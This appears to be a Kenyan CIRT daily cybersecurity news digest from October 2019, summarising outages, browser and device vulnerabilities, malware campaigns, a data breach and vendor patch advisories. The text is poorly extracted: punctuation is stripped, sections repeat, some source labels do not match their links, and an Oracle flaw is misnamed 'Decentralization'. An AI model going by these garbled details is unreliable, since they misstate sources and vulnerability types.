NATIONAL KE-CIRTCC CYBERSECURITY UPDATES

24th October 2019

Summary Headlines

Impact Metric Against Count of Events

Critical High Medium Informative

Regional Highlights 0 1 0 1

Top Stories 0 1 1 1

System vulnerabilities

1 2 0 0

Malware 0 2 0 0

DDoSBotnets 0 1 0 0

Spam amp phishing 0 1 0 0

Web Security 0 1 0 0

Updates amp alerts 0 1 1 0

Regional Highlights

Source 1 Citizen ( httpscitizentvcoke )httpscitizentvcokebusinessinternet-users-in-kenya-affected-as-seacom-cites-outage-290733Impact value High Internet users in Kenya affected as SEACOM cites outage SEACOM has announced a majornetwork outage affecting Kenya and South Africa The company that is behind the broadbandsubmarine cable system along the coast said services between Mombasa and Zafarana havebeen affected ldquoAll linear transmission traffic on the SEACOM Subsea Cable system on the EastCoast of Africa to and from Europe are affectedrdquo a statement from the company readsMyBroadband a South African IT news website reported that investigations are underway todetermine the cause of the outage and the estimated time to repair The outage is said to haveoccurred at 10pm on Tuesday SEACOM said customers with IP or other managed networkservices terminating between Dar es Salaam and South Africa will remain unaffected but couldexperience a slight increase in latency as traffic is routed over its West Coast transmission links

Source 2 Standard ( httpsstandardmediacoke )httpswwwstandardmediacokebusinessarticle2001346324stiff-penalties-for-those-who-abuse-private-dataImpact value InformativeStiff penalties for those who abuse private data MPs have proposed stiff fines and lengthyprison sentences for individuals and companies that illegally obtain citizensrsquo personal data Thepenalties also target those who disclose or sell private data to third partiesThe recommendations are contained in a report of the National Assembly DepartmentalCommittee on Communication Information and Innovation on the Data Protection Bill 2019

Summary Headlines

Impact Metric Against Count of Events

Critical High Medium Informative

Regional Highlights 0 1 0 1

Top Stories 0 1 1 1

System vulnerabilities

1 2 0 0

Malware 0 2 0 0

DDoSBotnets 0 1 0 0

Spam amp phishing 0 1 0 0

Web Security 0 1 0 0

Updates amp alerts 0 1 1 0

Regional Highlights

Source 1 Citizen ( httpscitizentvcoke )httpscitizentvcokebusinessinternet-users-in-kenya-affected-as-seacom-cites-outage-290733Impact value High Internet users in Kenya affected as SEACOM cites outage SEACOM has announced a majornetwork outage affecting Kenya and South Africa The company that is behind the broadbandsubmarine cable system along the coast said services between Mombasa and Zafarana havebeen affected ldquoAll linear transmission traffic on the SEACOM Subsea Cable system on the EastCoast of Africa to and from Europe are affectedrdquo a statement from the company readsMyBroadband a South African IT news website reported that investigations are underway todetermine the cause of the outage and the estimated time to repair The outage is said to haveoccurred at 10pm on Tuesday SEACOM said customers with IP or other managed networkservices terminating between Dar es Salaam and South Africa will remain unaffected but couldexperience a slight increase in latency as traffic is routed over its West Coast transmission links

Source 2 Standard ( httpsstandardmediacoke )httpswwwstandardmediacokebusinessarticle2001346324stiff-penalties-for-those-who-abuse-private-dataImpact value InformativeStiff penalties for those who abuse private data MPs have proposed stiff fines and lengthyprison sentences for individuals and companies that illegally obtain citizensrsquo personal data Thepenalties also target those who disclose or sell private data to third partiesThe recommendations are contained in a report of the National Assembly DepartmentalCommittee on Communication Information and Innovation on the Data Protection Bill 2019

Regional Highlights

Source 1 Citizen ( httpscitizentvcoke )httpscitizentvcokebusinessinternet-users-in-kenya-affected-as-seacom-cites-outage-290733Impact value High Internet users in Kenya affected as SEACOM cites outage SEACOM has announced a majornetwork outage affecting Kenya and South Africa The company that is behind the broadbandsubmarine cable system along the coast said services between Mombasa and Zafarana havebeen affected ldquoAll linear transmission traffic on the SEACOM Subsea Cable system on the EastCoast of Africa to and from Europe are affectedrdquo a statement from the company readsMyBroadband a South African IT news website reported that investigations are underway todetermine the cause of the outage and the estimated time to repair The outage is said to haveoccurred at 10pm on Tuesday SEACOM said customers with IP or other managed networkservices terminating between Dar es Salaam and South Africa will remain unaffected but couldexperience a slight increase in latency as traffic is routed over its West Coast transmission links

Source 2 Standard ( httpsstandardmediacoke )httpswwwstandardmediacokebusinessarticle2001346324stiff-penalties-for-those-who-abuse-private-dataImpact value InformativeStiff penalties for those who abuse private data MPs have proposed stiff fines and lengthyprison sentences for individuals and companies that illegally obtain citizensrsquo personal data Thepenalties also target those who disclose or sell private data to third partiesThe recommendations are contained in a report of the National Assembly DepartmentalCommittee on Communication Information and Innovation on the Data Protection Bill 2019

Top Stories

Source 1 Bleeping Computer ( httpswwwbleepingcomputercom ) httpswwwbleepingcomputercomnewssecurityhacker-plants-keylogger-devices-on-company-systems-faces-12yr-in-jailImpact value HighHacker Plants Keylogger Devices on Company Systems Faces 12yr in Jail A hacker admitted toplanting hardware keyloggers on computers belonging to two companies to getunauthorized to their networks and steal proprietary data He also added his laptop and ahard drive to the companys computer network He now faces 12 years of prison time Itappears that the individual was after data relating to an emerging technology that bothtargeted companies were developinghttpswwwbleepingcomputercomnewssecurityandroid-apps-identify-google-ips-to-delay-malicious-behaviorImpact value MediumAndroid Apps Identify Google IPs to Delay Malicious Behaviour Dozens of Android appsdesigned to flood phone screens with ads hide their malicious behavior when a Google IP isdetected Collectively they were installed 8 million times The developer of the 42 apps thatmade it into the official Android store added some tricks that made it more difficult toidentify the source of the adware on devicesSource 2 Threatpost ( httpsthreatpostcom )httpsthreatpostcomsurvey-finds-people-are-privacy-hypocrites149408Impact value InformativeSurvey Finds People are Privacy Hypocrites The surveymdashcommissioned by HP as part ofNational Cybersecurity Awareness Monthmdashfound that people are generally quite protectiveabout their own private data in the workplace and online even as we live more and more ofour lives publicly However they also tend to encroach on othersrsquo privacy when given theopportunity as a result of basic human nature according to the report called ldquoHP Creepersand Peekersrdquo The report by HP found that most people admit to looking at othersrsquo computerscreens and documents in the workplace while still keeping their own privacy top of mind

System vulnerabilities

Source 1 Threatpost ( httpsthreatpostcom ) httpsthreatpostcomcritical-firefox-bugs-arbitrary-code-execution149455Impact value CriticalFirefox Chrome Bugs Allow Arbitrary Code-Execution Critical vulnerabilities have beendiscovered in the Mozilla Firefox web browser and Firefox Extended Support Release(ESR) and a high-severity bug has been reported for Google Chrome all of which couldallow for arbitrary code execution The bugs were announced as part of larger updates (toChrome 78 stable channel release Firefox 70 and Firefox ESR 682) that also includedseveral fixes for high-severity and moderate flaws

httpsthreatpostcomfujitsu-wireless-keyboard-unpatched-flaws149477Impact value High Fujitsu Wireless Keyboard Plagued By Unpatched Flaws Two high-severity flaws discovered in a popular Fujitsu wireless keyboard set could allow attackers from a short distance away to ldquoeavesdroprdquo on passwords entered into the keyboards or even fully takeover a victimrsquos system

Source 2 Thenextweb ( httpsthreatpostcom ) httpsthenextwebcomsecurity20191023major-chinese-browser-maxthon-has-a-bug-that-allows-anyone-admin-accessImpact value High Major Chinese browser lsquoMaxthonrsquo has a bug that allows anyone admin access One of Chinalsquos most popular browsers Maxthon has a bug in its Windows version that can allow a hacker to take admin control and install malware A report by security firm SafeBreachnotes it reported the vulnerability in September

Malware

Source 1 Bleeping Computer ( httpswwwbleepingcomputercom ) Impact value Highhttpswwwbleepingcomputercomnewssecuritydiscord-turned-into-an-info-stealing-backdoor-by-new-malwareDiscord Turned Into an Info-Stealing Backdoor by New Malware Discovered by researcher MalwareHunterTeam earlier this month this malware is called Spidey Bot and when installed will add its own malicious JavaScript terminates and restart the Discord app in order for the new JavaScript changes to be executed Once started the JavaScript will execute various Discord API commands and JavaScript functions to collect a variety of information about the user that is then sent via a Discord webhook to the attacker

Source 2 Fireeye ( httpswwwfireeyecom ) httpswwwfireeyecomblogthreat-research201910shikata-ga-nai-encoder-still-going-stronghtmlImpact value HighShikata Ga Nai Encoder Still Going Strong Despite Metasploitrsquos over 15 yearexistence there are still core techniques that go undetected allowing maliciousactors to evade detection One of these core techniques is the Shikata Ga Nai(SGN) payload encoding scheme Modern detection systems have improveddramatically over the last several years and will often catch plain vanilla versionsof known malicious methods In many cases though if a threat actor knows whatthey are doing they can slightly modify existing code to bypass detection

DDoSBotnets

Source 1 Bleeping Computer ( httpswwwbleepingcomputercom ) httpswwwbleepingcomputercomnewssecuritynew-cpdos-web-cache-poisoning-attacks-impact-sites-using-popular-cdnsImpact value High New CPDoS Web Cache Poisoning Attacks Impact Sites Using Popular CDNs Details have emerged about a new class of web cache poisoning attacks that could be used to deny users access to resources delivered through a content delivery network (CDN)Named Cache-Poisoned Denial of Service (CPDoS) the new method has several variations and works by sending an HTTP request with a malformed header

Spam amp Phishing

Source 1 Zdnet ( httpswwwzdnetcom ) httpswwwzdnetcomarticleprolific-ceo-business-email-scam-leads-to-arrests-in-spainImpact value HighPhishing alert This fake email about a bank payment delivers trojan malware A highly customisable form of trojan malware has returned and is being distributed via phishing emails claiming that a payment is being made to a bank account Now researchers at Fortinet have uncovered a new Remcos campaign ndash with the new variant titled 250 Pro according to hard-coded strings in the malicious code that was compiled in September ndash indicating the freshness of this variant Available to crooks for as little as $58 the malware is an information stealer and surveillance tool using capabilities including keylogging taking screenshots and stealing clipboard contents to secretly take usernames and passwords from infected victims

Web Security

Source 1 Infosecurity ( httpswwwinfosecurity-magazinecom )

httpswwwinfosecurity-magazinecomnewscashback-websites-double-breach

Impact value High

Cash-back Websites Expose 2 TB of Sensitive Information Money-saving websites

used by over 35 million bargain hunters have leaked 2 terabytes of sensitive

information onto the dark web Data exposed by British website PouringPoundscom

and Indian sister site CashKarocom includes bank details full names mobile phone

numbers email addresses plain-text passwords and usernames IP addresses and

more Both sites are owned by PouringPounds Ltd The double breach was discovered

by a group of Safety Detectives researchers led by hacktivist and cybersecurity expert

Anurag Sen Researchers found the sensitive data in a publicly exposed database

hosted on an elastic server without any password protection

Bulletins

Source 1 US-CERT - Security Bulletin Mailing List ( httpwwwus-certgovcasbulletins )

httpswwwus-certgovncasbulletinssb19-294Vulnerability Summary for the Week of October 14 2019 Recorded by National Institute of Standards and Technology and National Vulnerability

Source 2 Oracle Security Bulletins ( httpwwworaclecomtechnetworktopicssecurityalerts-086861html )

httpswwworaclecomsecurity-alertscpuoct2019htmlOracle Critical Patch Update Advisory - October 2019 advised action to run available security updates

httpswwworaclecomtechnetworksecurity-advisoryalert-cve-2019-2729-5570780htmlOracle Security Alert Advisory - CVE-2019-2729 Decentralization vulnerability in Oracle WebLogic Server exploitable without authentication requirements advised action to run security updates

httpswwworaclecomtechnetworktopicssecuritybulletinjul2019-5600410htmlOracle Solaris Third Party Bulletin - July 2019 advised action to apply necessary patches

httpswwworaclecomtechnetworktopicssecuritylinuxbulletinjul2019-5600392htmlOracle Linux Bulletin - July 2019 advised action to apply necessary Oracle Linux Bulletin fixes

httpswwworaclecomtechnetworktopicssecuritypublic-vuln-to-advisory-mapping-093627htmlMap of CVE to AdvisoryAlert advised action to apply the critical patch update for protection against known vulnerabilities

httpswwworaclecomtechnetworktopicssecurityovmbulletinjul2019-5600406htmlOracle VM Server for x86 Bulletin - July 2019 advised action to apply necessary Oracle VM Server for x86 Bulletin fixes

Updates amp Alerts

Source 1 Cisco Security Advisories amp

Alerts(httptoolsciscocomsecuritycenterpublicationListingx )

httpstoolsciscocomsecuritycentercontentCiscoSecurityAdvisorycisco-sa-20190220-

hyperflex-injection

Impact value High

Cisco HyperFlex Software Command Injection Vulnerability The vulnerability is due to improper

handling of malformed HTTP methods An attacker could exploit this vulnerability by sending a

crafted HTTP request to the affected system A successful exploit could allow the attacker to gain

unauthorized access to the system Cisco has released software updates that address this

vulnerability There are workarounds that address this vulnerability

httpstoolsciscocomsecuritycentercontentCiscoSecurityAdvisorycisco-sa-20191016-wlc-

pathtrav

Impact value medium

Cisco Wireless LAN Controller Path Traversal Vulnerability This vulnerability is due to improper

sanitization of user-supplied input in command-line parameters that describe filenames An

attacker could exploit this vulnerability by using directory traversal techniques to submit a path to

a desired file location A successful exploit could allow the attacker to view system files that may

contain sensitive information

wwwke-cirtgoke